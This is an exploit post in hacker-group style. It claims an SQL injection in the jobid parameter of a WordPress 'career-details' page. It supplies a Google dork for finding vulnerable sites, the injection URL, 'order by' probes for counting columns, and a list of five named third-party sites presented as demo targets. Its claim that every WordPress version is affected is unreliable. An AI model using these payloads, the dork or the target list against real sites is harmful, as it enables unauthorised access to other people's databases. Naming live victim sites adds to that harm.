####################################################### # # [+] Exploit Title: Wordpress All Version career details Sql Injection Vulnerability # [+] Google Dork: inurl:/career-details/?jobid= # [+] Date: 10/10/2013 # [+] Exploit Author: Iranian_Dark_Coders_Team # [+] Discovered By: Black.Hack3r # [+] Version: All Version # [+] Security Risk: High # [+] Platforms: php # [+] Tested on: Windows 7 # ####################################################### # # [+] VULNERABILITY: # #Wordpress All Version career details Sql Injection Vulnerability # ####################################################### # # [+] Exploit: # #http://localhost/[path]/career-details/?jobid=3'[Sql Injection] # ####################################################### # # [+] Proof: # #http://localhost/[path]/career-details/?jobid=3+order+by+4-- No Error #http://localhost/[path]/career-details/?jobid=3+order+by+5-- Error # ####################################################### # # [+] Demo site: # #http://www.sheensol.com/career-details?jobid=1 #http://www.stuxbot.co.uk/career-details/?jobid=3 #http://www.op3global.com/career-details/?jobid=3 #http://p2pdevs.com/career-details/?jobid=2 #http://37.58.83.234/~geerling/en/career-details/?jobid=1 # ####################################################### # # [+] Discovered By : Black.Hack3r # [+] We Are : M.R.S.CO,Black.Hack3r,N3O # [+] SpTnx : Mr.Cicili,Sec4ever,D$@d_M@n,HOt0N,KurD_HaCK3R,MR.0x41,M4H4N,Security,@3is And All Members In wWw.IDC-TeaM.NeT # [+] Home : http://wWw.IDC-TeaM.NeT # #######################################################